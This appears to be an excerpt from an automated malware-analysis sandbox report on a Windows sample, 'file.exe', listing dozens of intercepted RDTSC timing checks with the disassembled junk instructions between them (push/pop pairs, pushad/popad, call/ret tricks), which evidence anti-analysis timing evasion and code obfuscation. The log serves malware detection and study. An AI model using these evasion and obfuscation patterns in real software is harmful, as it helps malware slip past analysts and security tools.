                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1106918 second address: 110694E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F6F31ADDF76h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110694E second address: 1106952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1106C71 second address: 1106C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F6F31ADDF66h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1107044 second address: 1107057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1107057 second address: 1107089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F6F31ADDF6Ah 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 js 00007F6F31ADDF6Ch 0x0000001b jp 00007F6F31ADDF66h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1107089 second address: 110708E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1107217 second address: 110721B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1109FAC second address: 1109FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1109FB2 second address: 1109FC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1109FC2 second address: 1109FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jno 00007F6F31405BDCh 0x0000000f pushad 0x00000010 jnc 00007F6F31405BD6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1109FEB second address: 1109FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110A103 second address: 110A115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BDEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110A115 second address: 110A119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110A209 second address: 110A236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D1AABh], ecx 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D366Bh] 0x00000017 jmp 00007F6F31405BDBh 0x0000001c push B0F002E2h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110A236 second address: 110A23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110A454 second address: 110A458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110A458 second address: 110A45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110A45E second address: 110A498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6F31405BDCh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 28CACB1Bh 0x00000014 xor edi, 446AA438h 0x0000001a lea ebx, dword ptr [ebp+1244EF20h] 0x00000020 xor di, 772Ah 0x00000025 push edx 0x00000026 mov cx, 1872h 0x0000002a pop edx 0x0000002b xchg eax, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110A498 second address: 110A49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1127CA6 second address: 1127CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11280CE second address: 11280D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11286D2 second address: 1128707 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F6F31405BD6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c push ecx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F6F31405BE9h 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 ja 00007F6F31405C05h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1128707 second address: 112870D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112870D second address: 1128711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1128711 second address: 112872C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF77h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11292B5 second address: 11292DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6F31405BE3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6F31405BDBh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11292DA second address: 11292DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112F119 second address: 112F13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6F31405BD6h 0x0000000a popad 0x0000000b pop esi 0x0000000c jng 00007F6F31405BF2h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F6F31405BDCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 112F13C second address: 112F142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FAD3A second address: 10FAD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10FAD3E second address: 10FAD55 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6F31ADDF6Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1131797 second address: 11317E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F6F31405BE8h 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007F6F31405BE7h 0x00000018 pop esi 0x00000019 pushad 0x0000001a jmp 00007F6F31405BE1h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11341C2 second address: 11341E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F6F31ADDF79h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11344AB second address: 11344B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1134937 second address: 1134954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jo 00007F6F31ADDF66h 0x0000000c pop ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6F31ADDF6Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1136D6C second address: 1136D72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1136D72 second address: 1136D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1136E4B second address: 1136E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1137353 second address: 1137357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1137357 second address: 113735D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1137416 second address: 1137434 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6F31ADDF76h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11378E8 second address: 11378EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11378EF second address: 11378F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11378F5 second address: 113791E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6F31405BE2h 0x0000000e nop 0x0000000f xor dword ptr [ebp+122D2C61h], eax 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113791E second address: 1137924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137924 second address: 1137928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137928 second address: 1137950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6F31ADDF6Ch 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137950 second address: 113795A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113795A second address: 113795E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137E58 second address: 1137ED5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6F31405BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F6F31405BD8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D2ADAh] 0x0000002c mov si, di 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F6F31405BD8h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D2AC6h], edi 0x00000051 push 00000000h 0x00000053 je 00007F6F31405BE0h 0x00000059 jbe 00007F6F31405BDAh 0x0000005f mov di, CE86h 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F6F31405BDEh 0x0000006b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1137ED5 second address: 1137EEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F6F31ADDF6Ch 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A316 second address: 113A320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A320 second address: 113A326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A326 second address: 113A3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 sbb edi, 7B782A00h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F6F31405BD8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 jmp 00007F6F31405BE5h 0x0000002e mov dword ptr [ebp+122D20D4h], ecx 0x00000034 sub esi, dword ptr [ebp+122D3517h] 0x0000003a push 00000000h 0x0000003c mov edi, 14832DFEh 0x00000041 pushad 0x00000042 jmp 00007F6F31405BDFh 0x00000047 push ebx 0x00000048 pop ebx 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007F6F31405BDFh 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 popad 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A3A5 second address: 113A3AF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6F31ADDF6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A3AF second address: 113A3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jg 00007F6F31405BD6h 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AD5B second address: 113AD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140D69 second address: 1140D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140D70 second address: 1140D75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113D796 second address: 113D79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140D75 second address: 1140DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6F31ADDF6Eh 0x0000000f nop 0x00000010 push ecx 0x00000011 pop edi 0x00000012 or ebx, 72E92690h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F6F31ADDF68h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov ebx, 2F32FCF7h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F6F31ADDF68h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 push edi 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113D79C second address: 113D7A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141EA6 second address: 1141EB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6F31ADDF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141EB0 second address: 1141EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 je 00007F6F31405BD6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141EC5 second address: 1141ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1141ECB second address: 1141F19 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6F31405BDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d mov ebx, esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F6F31405BD8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push esi 0x0000002c mov bx, 3E2Fh 0x00000030 pop edi 0x00000031 jng 00007F6F31405BD9h 0x00000037 sbb bl, 00000027h 0x0000003a xchg eax, esi 0x0000003b push esi 0x0000003c jc 00007F6F31405BDCh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142E47 second address: 1142E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F6F31ADDF70h 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007F6F31ADDF66h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1142E68 second address: 1142E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144D69 second address: 1144D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145DB1 second address: 1145E05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+122D1EB4h], ebx 0x00000010 mov dword ptr [ebp+12449DE2h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F6F31405BD8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 stc 0x00000035 movsx ebx, cx 0x00000038 xchg eax, esi 0x00000039 jmp 00007F6F31405BE4h 0x0000003e push eax 0x0000003f push ecx 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144EC0 second address: 1144ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31ADDF6Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1146C96 second address: 1146CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F6F31405BD6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147CBA second address: 1147CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149C96 second address: 1149C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E02 second address: 1149E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AD4D second address: 114AD51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E08 second address: 1149E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F6F31ADDF74h 0x00000010 jmp 00007F6F31ADDF6Bh 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CC2E second address: 114CC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114AD51 second address: 114AD6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149E36 second address: 1149E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114BF44 second address: 114BF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114CDF6 second address: 114CE09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
